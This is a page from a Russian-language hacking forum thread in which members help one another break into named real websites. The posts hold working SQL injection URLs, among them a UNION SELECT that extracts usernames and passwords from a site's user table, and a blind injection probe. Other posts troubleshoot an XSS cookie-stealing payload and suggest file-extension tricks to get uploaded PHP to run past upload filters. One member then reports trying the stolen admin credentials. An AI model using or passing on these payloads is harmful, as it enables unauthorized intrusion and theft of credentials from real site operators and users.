Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Это означает, что колонки "name" не найденно ;)
     
  2. ПаВлУшКа

    ПаВлУшКа New Member

    Joined:
    7 Feb 2009
    Messages:
    24
    Likes Received:
    4
    Reputations:
    0
    У меня вопрос по MS Access. Есть сайт http://www.ruw.edu.bh/template2.asp?id=218

    Подобрал кол-во полей с помощью order+by, их оказалось 13. Попробовал угадать имя таблицы, угадал таблицу user. Но при таком запросе

    http://www.ruw.edu.bh/template2.asp?id=-218+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from+user

    Выводит какую-то ошибку...( Что я не так делаю?
     
  3. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Access имеет зарезервированные слова и символы которые нельзя использовать абы как :)

    В данном случае ничего ты не нашёл, user не может быть таблицей, как и любое из этих слов :

    http://office.microsoft.com/ru-ru/access/HA100306431049.aspx
     
  4. Soviet[HZ]

    Soviet[HZ] Elder - Старейшина

    Joined:
    20 Jul 2007
    Messages:
    87
    Likes Received:
    40
    Reputations:
    22
    select+from+user использовать нельзя
    вот прочти ещё это:
    https://forum.antichat.ru/showpost.php?p=898813&postcount=25
     
    #6204 Soviet[HZ], 30 Mar 2009
    Last edited: 30 Mar 2009
  5. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Сделал брутер для именно этого сайта (Access) по словарям от SIPT4 - ни одной таблы не нашел, гы

    если интересно, путь:

    'c:\windows\system32\inetsrv\

    Интересно, у кого-нибудь есть словари для ACCESS? А то скрипт есть, а словаря нормального на такие случаи нет:)
     
    #6205 Pashkela, 30 Mar 2009
    Last edited: 30 Mar 2009
  6. S0ulVortex

    S0ulVortex Elder - Старейшина

    Joined:
    18 Nov 2007
    Messages:
    161
    Likes Received:
    85
    Reputations:
    10
    Собственно просто так выкладываю так как просто красивая ошибка жаль правда не че вывести нельзя.
    Code:
    http://soft.mail.ru/biblio/index.php?cat_id=21&year=2008&order=n&searchstring=%')/**/order/**/by/**/99%23
     
    2 people like this.
  7. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Почему нельзя, 4-ая ветка:

    Code:
    http://soft.mail.ru/biblio/index.php?cat_id=21&year=2008&order=n&searchstring=%')/**/and/**/substring(version(),1,1)=4%23
     
    1 person likes this.
  8. S0ulVortex

    S0ulVortex Elder - Старейшина

    Joined:
    18 Nov 2007
    Messages:
    161
    Likes Received:
    85
    Reputations:
    10
    Ну че то я не вижу версии :) Или я не туда смотрел :)
     
  9. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Если вместо 4 подставить 3 или 5 - результат на странице будет совсем другой. Тут blind sql-inj, но вполне работабельный
     
    1 person likes this.
  10. Ambassadorik

    Ambassadorik Member

    Joined:
    16 Feb 2009
    Messages:
    0
    Likes Received:
    13
    Reputations:
    0
    Вечер добрый , вобщем нашёл на одном крупном сайте xss (пассивку). Попытался вывести куки через алерт , и получил :
    Code:
    <store.**********.com>    
    undefined
    ,
    Что бы это могло значить ?
     
  11. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    Ambassadorik, "undifined" переводится как "не определено", думай что хочешь.
    м/б у тебя куки пустые?
     
  12. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Тупо нет куков, т.к. находишься на сайте на правах гостя, хотя есть еще много вариантов...
     
  13. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Скорее всего ты в XSS опечатался, например вместо document.cookie написал document.cookies .
     
  14. Ambassadorik

    Ambassadorik Member

    Joined:
    16 Feb 2009
    Messages:
    0
    Likes Received:
    13
    Reputations:
    0
    да , точно ...написал document.cookiee
     
  15. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    Есть доступ в админку, заливаю файл, php файлы не выполняются, а html выполняется.
    можно заливать любые файлы. залил пустой .htacess, таже фигня.
    подскажите как быть.
     
  16. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    phtml,php3,php5,phps?
    но скорее всего не поможет. кинь ссылку, поковырять можно будет.
     
  17. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Воспользуйся плагином для фф (или другим альтернативным способом), перехвати то, что передается серверу... Там может быть, что типо файл только html передается и т.д... =) Еще кстати попробуй так [filename].html.PhP5 - может поможет ;)
     
  18. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Нашел тут SQL-иньекция и вот очень хочеться раскрутить)
    Вот сама иньекия:
    Code:
    http://www.gnn.tv/videos/video.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+gnn_users--
    
    К сожелению не могу никак подобрать колонки =( Может поможет кто-нить) ?
     
  19. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    http://www.gnn.tv/videos/video.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x2F,usr_name,usr_pass),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+gnn_users--

    Сурс морды смотрите

    <div class="input_wrap"><input type="text" name="usr_name" value="user name" onfocus="if(this.value=='user name')this.value='';" onblur="if(this.value=='')this.value='user name';"></div>
    <div class="input_wrap"><input type="password" name="usr_pass" value=""></div>


    Я уже несколько раз обращал на это внимание. Прямой связи тут конечно нет, но нужно учитывать “человеческий фактор”
     
    #6219 ElteRUS, 31 Mar 2009
    Last edited: 31 Mar 2009
  20. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Такс... Спасибо) Но к сожелению пассы к админке не подошли( Может еще таблицы найдем какие-нибудь) ?
     
Thread Status:
Not open for further replies.